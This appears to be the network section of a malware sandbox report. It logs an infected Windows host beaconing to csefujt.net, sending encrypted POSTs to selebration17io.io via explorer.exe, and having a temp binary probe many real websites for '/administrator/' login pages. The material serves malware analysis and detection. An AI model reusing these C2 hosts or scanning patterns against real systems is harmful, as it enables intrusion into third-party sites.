Feb 5, 2024 12:14:41.656429052 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:41.893106937 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.6 | 49866 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:42.242583036 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:42.485846043 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
125 | 192.168.2.6 | 49867 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:42.830730915 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:43.067274094 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
126 | 192.168.2.6 | 49868 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:43.442486048 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:43.683675051 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
127 | 192.168.2.6 | 49870 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:44.063411951 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:44.305496931 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
128 | 192.168.2.6 | 49871 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:44.466073990 CET | 286 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://porpskhbqsfeiw.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 157
Host: selebration17io.io
Feb 5, 2024 12:14:44.466135979 CET | 157 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 a8 f2 05 bc
Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO-uG$`WXkMhVj)5e8[zI
Feb 5, 2024 12:14:44.718945980 CET | 194 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Mon, 05 Feb 2024 11:14:44 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
129 | 192.168.2.6 | 49872 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:44.991101027 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:45.235088110 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
130 | 192.168.2.6 | 49874 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:45.624133110 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:45.860800982 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
131 | 192.168.2.6 | 49875 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:46.219244003 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:46.463973045 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
132 | 192.168.2.6 | 49877 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:46.812902927 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:47.049515963 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
133 | 192.168.2.6 | 49878 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:47.400944948 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:47.642812014 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
134 | 192.168.2.6 | 49879 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:47.980295897 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:48.227332115 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:48 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
135 | 192.168.2.6 | 50366 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:48.789340973 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:49.026035070 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:48 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136 | 192.168.2.6 | 54606 | 172.203.148.34 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.161045074 CET | 183 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: eei.uniandes.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.277880907 CET | 158 | IN | HTTP/1.1 302 Found : Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://eei.uniandes.edu.co/administrator/
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
137 | 192.168.2.6 | 54610 | 104.18.41.153 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.163181067 CET | 175 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: app.plex.tv
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.312803030 CET | 295 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 17
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://app.plex.tv/administrator/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb67d897b08e-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Moved Permanently
Feb 5, 2024 12:14:53.480509043 CET | 229 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: app.plex.tv
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://app.plex.tv/administrator/
Feb 5, 2024 12:14:53.623760939 CET | 304 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 17
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://app.plex.tv/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7c9bf6b08e-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Moved Permanently


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
138 | 192.168.2.6 | 54633 | 104.17.62.50 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.182869911 CET | 183 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.faceit.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.318861008 CET760INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.faceit.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=WOxY2xKuaHEWhpJdZbP8rYzPhqjxld0MRCoNGeMXxSA-1707131690-1-ASZC69vX9PZEW30evFqsmb62Z5bDn8mYBr6CbmI0VqzV1mSTOHl6rgXG45B79c4NcZ9/YaaacrgDueS+m5gH19l9nHYYNI8/ocLI4P15BnxY; path=/; expires=Mon, 05-Feb-24 11:44:50 GMT; domain=.faceit.com; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _cfuvid=9GErBnItLnve1YgUyrQ2mg9oJPZqDyYBMAZDgAa73MA-1707131690253-0-604800000; path=/; domain=.faceit.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb67ff077bab-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.170186043 CET454OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.faceit.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: _cfuvid=9GErBnItLnve1YgUyrQ2mg9oJPZqDyYBMAZDgAa73MA-1707131690253-0-604800000; __cf_bm=WOxY2xKuaHEWhpJdZbP8rYzPhqjxld0MRCoNGeMXxSA-1707131690-1-ASZC69vX9PZEW30evFqsmb62Z5bDn8mYBr6CbmI0VqzV1mSTOHl6rgXG45B79c4NcZ9/YaaacrgDueS+m5gH19l9nHYYNI8/ocLI4P15BnxY
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.297420025 CET363INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.faceit.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd42eb4a7bab-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
139 | 192.168.2.6 | 54655 | 31.13.65.1 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.184695959 CET | 182 | OUT | GET /administrator/ HTTP/1.1
Host: pl-pl.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.286451101 CET | 216 | IN | HTTP/1.1 301 Moved Permanently
Location: https://pl-pl.facebook.com/administrator/
Content-Type: text/plain
Server: proxygen-bolt
Date: Mon, 05 Feb 2024 11:14:50 GMT
Connection: keep-alive
Content-Length: 0
Feb 5, 2024 12:16:05.888422012 CET | 191 | OUT | GET /administrator/index.php HTTP/1.1
Host: pl-pl.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:05.990487099 CET | 220 | IN | HTTP/1.1 301 Moved Permanently
Location: https://pl-pl.facebook.com/administrator/index.php
Content-Type: text/plain
Server: proxygen-bolt
Date: Mon, 05 Feb 2024 11:16:05 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
140 | 192.168.2.6 | 54780 | 64.91.249.20 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.280335903 CET | 176 | OUT | GET /administrator/ HTTP/1.1
Host: chainmine.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.424928904 CET | 359 | IN | HTTP/1.1 302 Moved Temporarily
Date: Mon, 05 Feb 2024 11:14:50 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Powered-By: PHP/5.4.16
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Location: http://ww1.chainmine.io/administrator/?usid=27&utid=4923801068
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
141 | 192.168.2.6 | 54757 | 54.71.181.160 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.315619946 CET | 185 | OUT | GET /administrator/ HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.487653017 CET | 1286 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Mon, 05 Feb 2024 11:14:05 GMT
Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
Feb 5, 2024 12:14:50.487668991 CET | 97 | IN | Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
Feb 5, 2024 12:14:50.490597963 CET | 248 | OUT | GET /administrator/index.php HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://ucivirtual.uci.edu.mx/administrator/
Feb 5, 2024 12:14:50.670378923 CET | 1286 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Mon, 05 Feb 2024 11:14:05 GMT
Content-Length: 1245
